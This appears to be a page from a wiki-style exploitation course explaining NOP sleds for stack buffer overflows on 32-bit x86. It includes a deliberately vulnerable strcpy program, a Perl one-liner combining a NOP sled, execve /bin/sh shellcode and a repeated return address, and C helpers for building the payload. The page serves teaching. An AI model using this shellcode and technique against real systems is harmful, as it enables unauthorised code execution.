====== NOP Sled ======
To transfer control flow directly to our shellcode, we need to specify its address as the return address of the current function. However, guessing the exact address can be very hard, especially on remote machines where no debugger is available. Even minor system differences can lead to a different stack layout.

**Example:** Remember that ''argv[0]'' contains the path that was used to invoke the program. Because the argument strings are stored on the stack, starting the binary from a different directory results in a different path and thus a different stack layout((Jon Erickson (2008). Hacking: The Art of Exploitation <nowiki>(2nd edition)</nowiki>)).

Missing the correct address by even a single byte breaks the exploit. Consider the following x86 assembly code, which immediately terminates the application.

<code asm nop/offset.s>
; nasm -f elf32 offset.s
global _start
_start:
mov eax, 1      ; system call number 1: exit
mov ebx, 0      ; exit status 0
int 0x80        ; invoke the kernel
</code>

Disassembling the object file with ''objdump'' shows the expected instructions.

<code>
$ objdump -d -M intel-mnemonic correct_offset.o 

correct_offset.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:   b8 01 00 00 00          mov    eax,0x1
   5:   bb 00 00 00 00          mov    ebx,0x0
   a:   cd 80                   int    0x80
</code>

Note that x86 instructions have variable lengths: each ''mov'' above occupies five bytes, while ''int 0x80'' occupies only two(([[https://www.sdsc.edu/~allans/cs141/L2.ISA.pdf|Instruction Set Architecture or "How to talk to computers if you aren't in Star Trek"]])).

To show the importance of correct instruction offsets, we delete only the very first byte (value ''0xb8'') of the code and disassemble the result again.

<code>
$ objdump -d -M intel-mnemonic incorrect_offset.o

incorrect_offset.o:     file format elf32-i386


Disassembly of section text:

00000000 <text>:
   0:   01 00                   add    DWORD PTR [eax],eax
   2:   00 00                   add    BYTE PTR [eax],al
   4:   bb 00 00 00 00          mov    ebx,0x0
   9:   cd 80                   int    0x80
        ...
</code>

Note that even in this tiny example, deleting a single byte yields significantly different code: the first ''mov'' has turned into two ''add'' instructions that access the memory ''eax'' points to.
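
The effect can be reproduced with a few lines of C. The following sketch is a toy length decoder, not a real disassembler: it only knows the five opcodes that occur in the two listings above and gives up on anything else. The names ''insn_len'', ''insn_starts'' and ''exit_code'' are made up for this illustration.

<code c>
#include <stddef.h>
#include <stdint.h>

/* Toy length decoder: handles ONLY the byte patterns from the two
 * listings above and returns 0 for everything else. */
static size_t insn_len(const uint8_t *p, size_t avail)
{
    if (avail == 0)
        return 0;
    switch (p[0]) {
    case 0xb8: /* mov eax, imm32 */
    case 0xbb: /* mov ebx, imm32 */
        return avail >= 5 ? 5 : 0;
    case 0xcd: /* int imm8 */
        return avail >= 2 ? 2 : 0;
    case 0x00: /* add r/m8, r8 */
    case 0x01: /* add r/m32, r32 */
        /* Assumption: only ModRM 0x00 ([eax], no displacement). */
        return (avail >= 2 && p[1] == 0x00) ? 2 : 0;
    default:
        return 0;
    }
}

/* Decodes `code` beginning at offset `start` and stores the offset of
 * every instruction found in `starts`. Returns the instruction count. */
static size_t insn_starts(const uint8_t *code, size_t len, size_t start,
                          size_t *starts, size_t max)
{
    size_t n = 0;
    size_t off = start;

    while (off < len && n < max) {
        size_t l = insn_len(code + off, len - off);
        if (l == 0)
            break;
        starts[n++] = off;
        off += l;
    }
    return n;
}

/* The machine code of the exit example from the first listing. */
static const uint8_t exit_code[] = {
    0xb8, 0x01, 0x00, 0x00, 0x00, /* mov eax, 1 */
    0xbb, 0x00, 0x00, 0x00, 0x00, /* mov ebx, 0 */
    0xcd, 0x80                    /* int 0x80   */
};
</code>

Starting at offset 0, ''insn_starts'' reports the instruction boundaries 0, 5 and 10. Starting at offset 1, which corresponds to the deleted first byte, it reports 1, 3, 5 and 10: two ''add'' instructions replace the first ''mov'', and decoding only falls back in step at the second ''mov''.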

What we want now is a memory area in front of our code to which execution can safely be redirected. The bytes in this area must therefore be valid instructions. As seen above, an offset of a single byte can change the meaning of the code entirely. To avoid this, we need an instruction that is only a single byte long, so that every address in the area is the start of a valid instruction. Our final requirement is that the instruction does not affect any registers (except for the instruction pointer, which naturally advances by one after execution). The x86 instruction set provides an instruction that fulfills all of these requirements: NOP (**N**o **OP**eration). It has the opcode ''0x90'' and is documented as an alias for the following instruction(([[https://www-ssl.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-manual-325462.pdf|Intel® 64 and IA-32 Architectures Software Developer’s Manual]])):

<code asm>
xchg eax,eax
</code>

Next, we look at a simple example that makes use of this technique, called a ''NOP sled''(([[http://phrack.org/issues/49/14.html|.:: Phrack Magazine ::. - Smashing The Stack For Fun And Profit]])).

<code c nop/execve.c>
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 execve.c
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[128] = {0};

    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }

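    // Print the buffer address so that the jump target can be estimated.
    printf("Buffer: %p\n", buffer);
    // Unbounded copy: an argument longer than 127 bytes overflows the buffer.
    strcpy(buffer, argv[1]);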

    return 0;
}
</code>

Inspecting the code above, you will notice that the only difference from our example in the [[.basic#arbitrary_code_execution|buffer overflow introduction]] is the size of the buffer. Back then, it was of utmost importance to overwrite the return address correctly and to know exactly which address to jump to. By placing a sequence of NOPs directly before the shellcode, we can loosen the second constraint. This sequence of NOPs is commonly called a "NOP sled"((Jon Erickson (2008). Hacking: The Art of Exploitation <nowiki>(2nd edition)</nowiki>)). Returning to any address within this sequence works just as well as landing exactly at the beginning of the shellcode. If execution lands in the NOPs, the processor spends some cycles doing nothing until it reaches the actual shellcode.

In this example we have a buffer of 128 bytes, while our shellcode takes up only 28 bytes. This leaves 100 bytes of space for the NOP sled. As this many characters are cumbersome to type and copy, we will generate the input with [[perl:start|Perl]]. The NOP sled is followed by the actual shellcode and the approximate address we want to jump to. It is sufficient to land somewhere within the 100-byte range of the NOP sled; we do not need to know the exact address of the shellcode. Assuming correct alignment with respect to the stack variables, we can also repeat the target address several times to increase the chance of overwriting the return address.

Our payload now contains the following:
  * 100 bytes of NOP sled
  * 28 bytes of shellcode
  * 16 bytes containing the approximate target address ''0xffffd2ff'' (the 4-byte address repeated 4 times)
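
The same layout can also be sketched in C. This is only an illustration of how the three parts are concatenated, not a replacement for the Perl one-liner: the function name ''build_payload'' and its parameters are hypothetical, and the 28 shellcode bytes are copied from the command shown further down.

<code c>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* The 28 shellcode bytes used in this example. */
static const uint8_t shellcode[] = {
    0x83, 0xec, 0x30, 0x31, 0xc0, 0x50, 0x68, 0x6e, 0x2f, 0x73,
    0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3, 0x50, 0x53,
    0x89, 0xe1, 0x89, 0xc2, 0xb0, 0x0b, 0xcd, 0x80
};

/* Writes NOP sled + shellcode + repeated target address into `out`.
 * Returns the payload length, or 0 if `out` is too small. */
static size_t build_payload(uint8_t *out, size_t out_size,
                            size_t sled_len,
                            const uint8_t *code, size_t code_len,
                            uint32_t target, size_t repeats)
{
    size_t total = sled_len + code_len + 4 * repeats;
    if (total > out_size)
        return 0;

    memset(out, 0x90, sled_len);            /* NOP sled  */
    memcpy(out + sled_len, code, code_len); /* shellcode */

    uint8_t *p = out + sled_len + code_len;
    for (size_t i = 0; i < repeats; i++) {
        /* x86 is little-endian: least significant byte first. */
        *p++ = (uint8_t)(target & 0xff);
        *p++ = (uint8_t)((target >> 8) & 0xff);
        *p++ = (uint8_t)((target >> 16) & 0xff);
        *p++ = (uint8_t)((target >> 24) & 0xff);
    }
    return total;
}
</code>

Called with a sled length of 100, the shellcode above, the target ''0xffffd2ff'' and 4 repetitions, the function fills 144 bytes: the sled and the shellcode occupy exactly the 128 bytes of the buffer, and the address copies follow directly behind it.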

A visual representation of the memory layout is included below.

{{.nop.png?450|}}

Passing this payload to the application successfully spawns a shell.

<code>
$ ./a.out $(perl -e 'print
"\x90"x100 .
"\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" .
"\xff\xd2\xff\xff"x4')
Buffer: 0xffffd2e4
$
</code>
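
The printed buffer address lets us check why the guess worked. The short sketch below does the arithmetic, assuming that the sled starts at the first byte of the buffer as in the payload above; the helper names ''lands_in_sled'' and ''nops_executed'' are made up for this illustration.

<code c>
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if `target` points into the sled that starts at `buffer`
 * and is `sled_len` bytes long, 0 otherwise. */
static int lands_in_sled(uint32_t buffer, size_t sled_len, uint32_t target)
{
    return target >= buffer && (size_t)(target - buffer) < sled_len;
}

/* Number of NOPs the processor executes before reaching the shellcode.
 * Only meaningful if lands_in_sled() returned 1. */
static size_t nops_executed(uint32_t buffer, size_t sled_len, uint32_t target)
{
    return sled_len - (size_t)(target - buffer);
}
</code>

For the buffer address ''0xffffd2e4'' and the target ''0xffffd2ff'', the target lies 27 bytes into the sled, so 73 NOPs are executed before the shellcode starts. Any other address from ''0xffffd2e4'' to ''0xffffd347'' would have worked as well, except for those containing a zero byte (such as ''0xffffd300''), because ''strcpy'' stops copying at the first zero byte.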


\\
----
<html>
<table style="width:100%">
  <tr>
    <td align="left" style="width:33%"></html>[[.basic|← Back to buffer overflow basics]]<html></td>
    <td align="center" style="width:34%"></html>[[..start|Overview]]<html></td>
    <td align="right" style="width:33%"></html>[[.external-buffers|Continue with external buffers →]]<html></td>
  </tr>
</table>
</html>